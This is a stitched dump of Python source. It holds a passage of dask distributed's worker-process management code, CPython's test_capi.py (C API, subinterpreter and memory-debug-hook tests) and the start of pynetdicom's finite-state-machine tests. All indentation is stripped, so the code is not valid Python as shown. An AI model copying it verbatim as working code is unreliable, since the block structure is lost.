self.worker_address = msg["address"]
self.worker_dir = msg["dir"]
assert self.worker_address
self.status = Status.running
self.running.set()
init_q.close()
return self.status
def _on_exit(self, proc):
if proc is not self.process:
# Ignore exit of old process instance
return
self.mark_stopped()
def _death_message(self, pid, exitcode):
assert exitcode is not None
if exitcode == 255:
return "Worker process %d was killed by unknown signal" % (pid,)
elif exitcode >= 0:
return "Worker process %d exited with status %d" % (pid, exitcode)
else:
return "Worker process %d was killed by signal %d" % (pid, -exitcode)
def is_alive(self):
return self.process is not None and self.process.is_alive()
@property
def pid(self):
return self.process.pid if self.process and self.process.is_alive() else None
def mark_stopped(self):
if self.status != Status.stopped:
r = self.process.exitcode
assert r is not None
if r != 0:
msg = self._death_message(self.process.pid, r)
logger.info(msg)
self.status = Status.stopped
self.stopped.set()
# Release resources
self.process.close()
self.init_result_q = None
self.child_stop_q = None
self.process = None
# Best effort to clean up worker directory
if self.worker_dir and os.path.exists(self.worker_dir):
shutil.rmtree(self.worker_dir, ignore_errors=True)
self.worker_dir = None
# User hook
if self.on_exit is not None:
self.on_exit(r)
async def kill(self, timeout=2, executor_wait=True):
"""
Ensure the worker process is stopped, waiting at most
*timeout* seconds before terminating it abruptly.
"""
loop = IOLoop.current()
deadline = loop.time() + timeout
if self.status == Status.stopped:
return
if self.status == Status.stopping:
await self.stopped.wait()
return
assert self.status in (Status.starting, Status.running)
self.status = Status.stopping
process = self.process
self.child_stop_q.put(
{
"op": "stop",
"timeout": max(0, deadline - loop.time()) * 0.8,
"executor_wait": executor_wait,
}
)
await asyncio.sleep(0) # otherwise we get broken pipe errors
self.child_stop_q.close()
while process.is_alive() and loop.time() < deadline:
await asyncio.sleep(0.05)
if process.is_alive():
logger.warning(
"Worker process still alive after %d seconds, killing", timeout
)
try:
await process.terminate()
except Exception as e:
logger.error("Failed to kill worker process: %s", e)
async def _wait_until_connected(self, uid):
while True:
if self.status != Status.starting:
return
# This is a multiprocessing queue and we'd block the event loop if
# we simply called get
try:
msg = self.init_result_q.get_nowait()
except Empty:
await asyncio.sleep(self._init_msg_interval)
continue
if msg["uid"] != uid: # ensure that we didn't cross queues
continue
if "exception" in msg:
logger.error(
"Failed while trying to start worker process: %s", msg["exception"]
)
raise msg["exception"]
else:
return msg
@classmethod
def _run(
cls,
worker_kwargs,
worker_start_args,
silence_logs,
init_result_q,
child_stop_q,
uid,
env,
config,
Worker,
): # pragma: no cover
try:
os.environ.update(env)
dask.config.set(config)
try:
from dask.multiprocessing import initialize_worker_process
except ImportError: # old Dask version
pass
else:
initialize_worker_process()
if silence_logs:
logger.setLevel(silence_logs)
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
worker = Worker(**worker_kwargs)
async def do_stop(timeout=5, executor_wait=True):
try:
await worker.close(
report=True,
nanny=False,
safe=True, # TODO: Graceful or not?
executor_wait=executor_wait,
timeout=timeout,
)
finally:
loop.stop()
def watch_stop_q():
"""
Wait for an incoming stop message and then stop the
worker cleanly.
"""
while True:
try:
msg = child_stop_q.get(timeout=1000)
except Empty:
pass
else:
child_stop_q.close()
assert msg.pop("op") == "stop"
loop.add_callback(do_stop, **msg)
break
t = threading.Thread(target=watch_stop_q, name="Nanny stop queue watch")
t.daemon = True
t.start()
async def run():
"""
Try to start worker and inform parent of outcome.
"""
try:
await worker
except Exception as e:
logger.exception("Failed to start worker")
init_result_q.put({"uid": uid, "exception": e})
init_result_q.close()
# If we hit an exception here we need to wait for at least
# one interval for the outside to pick up this message.
# Otherwise we arrive in a race condition where the process
# cleanup wipes the queue before the exception can be
# properly handled. See also
# WorkerProcess._wait_until_connected (the 2 is for good
# measure)
sync_sleep(cls._init_msg_interval * 2)
else:
try:
assert worker.address
except ValueError:
pass
else:
init_result_q.put(
{
"address": worker.address,
"dir": worker.local_directory,
"uid": uid,
}
)
init_result_q.close()
await worker.finished()
logger.info("Worker closed")
except Exception as e:
logger.exception("Failed to initialize Worker")
init_result_q.put({"uid": uid, "exception": e})
init_result_q.close()
# If we hit an exception here we need to wait for at least one
# interval for the outside to pick up this message. Otherwise we
# arrive in a race condition where the process cleanup wipes the
# queue before the exception can be properly handled. See also
# WorkerProcess._wait_until_connected (the 2 is for good measure)
sync_sleep(cls._init_msg_interval * 2)
else:
try:
loop.run_sync(run)
except (TimeoutError, gen.TimeoutError):
# Loop was stopped before wait_until_closed() returned, ignore
pass
except KeyboardInterrupt:
# At this point the loop is not running thus we have to run
# do_stop() explicitly.
loop.run_sync(do_stop)
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by definition,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import namedtuple
import os
import pickle
import platform
import random
import re
import subprocess
import sys
import sysconfig
import textwrap
import threading
import time
import unittest
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error:'
b' PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned NULL '
br'without setting an error\n'
br'SystemError: <built-in function '
br'return_null_without_error> returned NULL '
br'without setting an error\n'
br'\n'
br'Current thread.*:\n'
br' File .*", line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an error')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned a '
br'result with an error set\n'
br'ValueError\n'
br'\n'
br'The above exception was the direct cause '
br'of the following exception:\n'
br'\n'
br'SystemError: <built-in '
br'function return_result_with_error> '
br'returned a result with an error set\n'
br'\n'
br'Current thread.*:\n'
br' File .*, line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an error set')
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
self.assertIn(b'MemoryError 1 10', out)
self.assertIn(b'MemoryError 2 20', out)
self.assertIn(b'MemoryError 3 30', out)
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
# Bug #6012
class Test6012(unittest.TestCase):
def test(self):
self.assertEqual(_testcapi.argparsing("Hello", "World"), 1)
class EmbeddingTests(unittest.TestCase):
def setUp(self):
here = os.path.abspath(__file__)
basepath = os.path.dirname(os.path.dirname(os.path.dirname(here)))
exename = "_testembed"
if sys.platform.startswith("win"):
ext = ("_d" if "_d" in sys.executable else "") + ".exe"
exename += ext
exepath = os.path.dirname(sys.executable)
else:
exepath = os.path.join(basepath, "Programs")
self.test_exe = exe = os.path.join(exepath, exename)
if not os.path.exists(exe):
self.skipTest("%r doesn't exist" % exe)
# This is needed otherwise we get a fatal error:
# "Py_Initialize: Unable to get the locale encoding
# LookupError: no codec search functions registered: can't find encoding"
self.oldcwd = os.getcwd()
os.chdir(basepath)
def tearDown(self):
os.chdir(self.oldcwd)
def run_embedded_interpreter(self, *args, env=None):
"""Runs a test in the embedded interpreter"""
cmd = [self.test_exe]
cmd.extend(args)
if env is not None and sys.platform == 'win32':
# Windows requires at least the SYSTEMROOT environment variable to
# start Python.
env = env.copy()
env['SYSTEMROOT'] = os.environ['SYSTEMROOT']
p = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
env=env)
(out, err) = p.communicate()
self.assertEqual(p.returncode, 0,
"bad returncode %d, stderr is %r" %
(p.returncode, err))
return out, err
def run_repeated_init_and_subinterpreters(self):
out, err = self.run_embedded_interpreter("repeated_init_and_subinterpreters")
self.assertEqual(err, "")
# The output from _testembed looks like this:
# --- Pass 0 ---
# interp 0 <0x1cf9330>, thread state <0x1cf9700>: id(modules) = 139650431942728
# interp 1 <0x1d4f690>, thread state <0x1d35350>: id(modules) = 139650431165784
# interp 2 <0x1d5a690>, thread state <0x1d99ed0>: id(modules) = 139650413140368
# interp 3 <0x1d4f690>, thread state <0x1dc3340>: id(modules) = 139650412862200
# interp 0 <0x1cf9330>, thread state <0x1cf9700>: id(modules) = 139650431942728
# --- Pass 1 ---
# ...
interp_pat = (r"^interp (\d+) <(0x[\dA-F]+)>, "
r"thread state <(0x[\dA-F]+)>: "
r"id\(modules\) = ([\d]+)$")
Interp = namedtuple("Interp", "id interp tstate modules")
numloops = 0
current_run = []
for line in out.splitlines():
if line == "--- Pass {} ---".format(numloops):
self.assertEqual(len(current_run), 0)
if support.verbose:
print(line)
numloops += 1
continue
self.assertLess(len(current_run), 5)
match = re.match(interp_pat, line)
if match is None:
self.assertRegex(line, interp_pat)
# Parse the line from the loop. The first line is the main
# interpreter and the 3 afterward are subinterpreters.
interp = Interp(*match.groups())
if support.verbose:
print(interp)
self.assertTrue(interp.interp)
self.assertTrue(interp.tstate)
self.assertTrue(interp.modules)
current_run.append(interp)
# The last line in the loop should be the same as the first.
if len(current_run) == 5:
main = current_run[0]
self.assertEqual(interp, main)
yield current_run
current_run = []
def test_subinterps_main(self):
for run in self.run_repeated_init_and_subinterpreters():
main = run[0]
self.assertEqual(main.id, '0')
def test_subinterps_different_ids(self):
for run in self.run_repeated_init_and_subinterpreters():
main, *subs, _ = run
mainid = int(main.id)
for i, sub in enumerate(subs):
self.assertEqual(sub.id, str(mainid + i + 1))
def test_subinterps_distinct_state(self):
for run in self.run_repeated_init_and_subinterpreters():
main, *subs, _ = run
if '0x0' in main:
# XXX Fix on Windows (and other platforms): something
# is going on with the pointers in Programs/_testembed.c.
# interp.interp is 0x0 and interp.modules is the same
# between interpreters.
raise unittest.SkipTest('platform prints pointers as 0x0')
for sub in subs:
# A new subinterpreter may have the same
# PyInterpreterState pointer as a previous one if
# the earlier one has already been destroyed. So
# we compare with the main interpreter. The same
# applies to tstate.
self.assertNotEqual(sub.interp, main.interp)
self.assertNotEqual(sub.tstate, main.tstate)
self.assertNotEqual(sub.modules, main.modules)
def test_forced_io_encoding(self):
# Checks forced configuration of embedded interpreter IO streams
env = dict(os.environ, PYTHONIOENCODING="utf-8:surrogateescape")
out, err = self.run_embedded_interpreter("forced_io_encoding", env=env)
if support.verbose > 1:
print()
print(out)
print(err)
expected_stream_encoding = "utf-8"
expected_errors = "surrogateescape"
expected_output = '\n'.join([
"--- Use defaults ---",
"Expected encoding: default",
"Expected errors: default",
"stdin: {in_encoding}:{errors}",
"stdout: {out_encoding}:{errors}",
"stderr: {out_encoding}:backslashreplace",
"--- Set errors only ---",
"Expected encoding: default",
"Expected errors: ignore",
"stdin: {in_encoding}:ignore",
"stdout: {out_encoding}:ignore",
"stderr: {out_encoding}:backslashreplace",
"--- Set encoding only ---",
"Expected encoding: latin-1",
"Expected errors: default",
"stdin: latin-1:{errors}",
"stdout: latin-1:{errors}",
"stderr: latin-1:backslashreplace",
"--- Set encoding and errors ---",
"Expected encoding: latin-1",
"Expected errors: replace",
"stdin: latin-1:replace",
"stdout: latin-1:replace",
"stderr: latin-1:backslashreplace"])
expected_output = expected_output.format(
in_encoding=expected_stream_encoding,
out_encoding=expected_stream_encoding,
errors=expected_errors)
# This is useful if we ever trip over odd platform behaviour
self.maxDiff = None
self.assertEqual(out.strip(), expected_output)
class SkipitemTest(unittest.TestCase):
def test_skipitem(self):
"""
If this test failed, you probably added a new "format unit"
in Python/getargs.c, but neglected to update our poor friend
skipitem() in the same file. (If so, shame on you!)
With a few exceptions**, this function brute-force tests all
printable ASCII*** characters (32 to 126 inclusive) as format units,
checking to see that PyArg_ParseTupleAndKeywords() return consistent
errors both when the unit is attempted to be used and when it is
skipped. If the format unit doesn't exist, we'll get one of two
specific error messages (one for used, one for skipped); if it does
exist we *won't* get that error--we'll get either no error or some
other error. If we get the specific "does not exist" error for one
test and not for the other, there's a mismatch, and the test fails.
** Some format units have special funny semantics and it would
be difficult to accommodate them here. Since these are all
well-established and properly skipped in skipitem() we can
get away with not testing them--this test is really intended
to catch *new* format units.
*** Python C source files must be ASCII. Therefore it's impossible
to have non-ASCII format units.
"""
empty_tuple = ()
tuple_1 = (0,)
dict_b = {'b':1}
keywords = ["a", "b"]
for i in range(32, 127):
c = chr(i)
# skip parentheses, the error reporting is inconsistent about them
# skip 'e', it's always a two-character code
# skip '|' and '$', they don't represent arguments anyway
if c in '()e|$':
continue
# test the format unit when not skipped
format = c + "i"
try:
_testcapi.parse_tuple_and_keywords(tuple_1, dict_b,
format, keywords)
when_not_skipped = False
except SystemError as e:
s = "argument 1 (impossible<bad format char>)"
when_not_skipped = (str(e) == s)
except TypeError:
when_not_skipped = False
# test the format unit when skipped
optional_format = "|" + format
try:
_testcapi.parse_tuple_and_keywords(empty_tuple, dict_b,
optional_format, keywords)
when_skipped = False
except SystemError as e:
s = "impossible<bad format char>: '{}'".format(format)
when_skipped = (str(e) == s)
message = ("test_skipitem_parity: "
"detected mismatch between convertsimple and skipitem "
"for format unit '{}' ({}), not skipped {}, skipped {}".format(
c, i, when_skipped, when_not_skipped))
self.assertIs(when_skipped, when_not_skipped, message)
def test_parse_tuple_and_keywords(self):
# Test handling errors in the parse_tuple_and_keywords helper itself
self.assertRaises(TypeError, _testcapi.parse_tuple_and_keywords,
(), {}, 42, [])
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, '', 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, '', [''] * 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, '', [42])
def test_bad_use(self):
# Test handling invalid format and keywords in
# PyArg_ParseTupleAndKeywords()
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(1,), {}, '||O', ['a'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(1, 2), {}, '|O|O', ['a', 'b'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {'a': 1}, '$$O', ['a'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {'a': 1, 'b': 2}, '$O$O', ['a', 'b'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {'a': 1}, '$|O', ['a'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {'a': 1, 'b': 2}, '$O|O', ['a', 'b'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(1,), {}, '|O', ['a', 'b'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(1,), {}, '|OO', ['a'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {}, '|$O', [''])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {}, '|OO', ['a', ''])
def test_positional_only(self):
parse = _testcapi.parse_tuple_and_keywords
parse((1, 2, 3), {}, 'OOO', ['', '', 'a'])
parse((1, 2), {'a': 3}, 'OOO', ['', '', 'a'])
with self.assertRaisesRegex(TypeError,
r'function takes at least 2 positional arguments \(1 given\)'):
parse((1,), {'a': 3}, 'OOO', ['', '', 'a'])
parse((1,), {}, 'O|OO', ['', '', 'a'])
with self.assertRaisesRegex(TypeError,
r'function takes at least 1 positional arguments \(0 given\)'):
parse((), {}, 'O|OO', ['', '', 'a'])
parse((1, 2), {'a': 3}, 'OO$O', ['', '', 'a'])
with self.assertRaisesRegex(TypeError,
r'function takes exactly 2 positional arguments \(1 given\)'):
parse((1,), {'a': 3}, 'OO$O', ['', '', 'a'])
parse((1,), {}, 'O|O$O', ['', '', 'a'])
with self.assertRaisesRegex(TypeError,
r'function takes at least 1 positional arguments \(0 given\)'):
parse((), {}, 'O|O$O', ['', '', 'a'])
with self.assertRaisesRegex(SystemError, r'Empty parameter name after \$'):
parse((1,), {}, 'O|$OO', ['', '', 'a'])
with self.assertRaisesRegex(SystemError, 'Empty keyword'):
parse((1,), {}, 'O|OO', ['', 'a', ''])
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
def test__testcapi(self):
for name in dir(_testcapi):
if name.startswith('test_'):
with self.subTest("internal", name=name):
test = getattr(_testcapi, name)
test()
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure('-c', code,
PYTHONMALLOC=self.PYTHONMALLOC)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfb\n"
r" at tail\+2: 0xfb\n"
r" .*\n"
r" The block was made by call #[0-9]+ to debug malloc/realloc.\n"
r" Data at p: cb cb cb .*\n"
r"\n"
r"Fatal Python error: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r" The block was made by call #[0-9]+ to debug malloc/realloc.\n"
r" Data at p: cb cb cb .*\n"
r"\n"
r"Fatal Python error: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: Python memory allocator called '
'without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(sysconfig.get_config_var('WITH_PYMALLOC') == 1,
'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
if __name__ == "__main__":
unittest.main()
|
test_fsm.py
|
"""Unit tests for fsm.py"""
import datetime
import logging
import select
import socket
from struct import pack
import sys
import threading
import time
import pytest
from pynetdicom import AE, build_context, evt, debug_logger
from pynetdicom.association import Association
from pynetdicom import fsm as FINITE_STATE
from pynetdicom.fsm import *
from pynetdicom.dimse_primitives import C_ECHO
from pynetdicom.pdu_primitives import (
A_ASSOCIATE, A_ABORT, A_P_ABORT, P_DATA, A_RELEASE,
MaximumLengthNotification, ImplementationClassUIDNotification
)
from pynetdicom.pdu import A_RELEASE_RQ
from pynetdicom.sop_class import VerificationSOPClass
from pynetdicom.transport import AssociationSocket
from pynetdicom.utils import validate_ae_title
from .encoded_pdu_items import (
a_associate_ac, a_associate_rq, a_associate_rj, p_data_tf, a_abort,
a_release_rq, a_release_rp,
)
from .parrot import ThreadedParrot
#debug_logger()
REFERENCE_BAD_EVENTS = [
# Event, bad states
("Evt1", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (rq) p
("Evt2", [1, 2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection available
("Evt3", [1, 4]), # A-ASSOCIATE-AC PDU recv
("Evt4", [1, 4]), # A-ASSOCIATE-RJ PDU recv
("Evt5", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection open
("Evt6", [1, 4]), # A-ASSOCIATE-RQ PDU recv
("Evt7", [1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (ac) p
("Evt8", [1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (rj) p
("Evt9", [1, 2, 3, 4, 5, 7, 9, 10, 11, 12, 13]), # P-DATA primitive
("Evt10", [1, 4]), # P-DATA-TF PDU
("Evt11", [1, 2, 3, 4, 5, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE (rq) p
("Evt12", [1, 4]), # A-RELEASE-RQ PDU recv
("Evt13", [1, 4]), # A-RELEASE-RP PDU recv
("Evt14", [1, 2, 3, 4, 5, 6, 7, 10, 11, 13]), # A-RELEASE (rsp) primitive
("Evt15", [1, 2, 13]), # A-ABORT (rq) primitive
("Evt16", [1, 4]), # A-ABORT PDU recv
